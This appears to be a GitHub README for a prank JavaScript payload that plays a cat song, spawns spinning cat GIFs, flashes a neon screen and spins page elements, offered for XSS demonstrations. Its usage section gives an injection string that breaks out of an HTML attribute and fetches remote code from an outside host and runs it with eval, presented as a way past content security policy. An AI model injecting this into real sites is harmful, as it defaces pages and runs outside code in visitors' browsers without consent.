Skip to content

orlyjamie/spinningcat

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

🐱 Spinning Cat Chaos Script

Spinning Cat

This repository contains a chaotic JavaScript script that:

  • Plays an audio file of a cat song.
  • Spawns spinning cat GIFs all over the page.
  • Flashes a neon green screen intermittently (warning).
  • Makes all elements on the page spin.

Perfect for XSS demonstrations or just to prank your friends!


🚀 Usage

1. Direct Link

You can directly embed the script using this URL:

<script src="https://meowww.lol/cat.js"></script>

2. Fetch and Execute Inline

If external scripts are blocked by CSP, try this:

"><script>fetch('https://meowww.lol/cat.js').then(r=>r.text()).then(eval)</script>

💬 Contact

https://x.com/theonejvo

https://www.linkedin.com/in/theonejvo/

Enjoy the chaos! 🐱🎶💚🔄

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published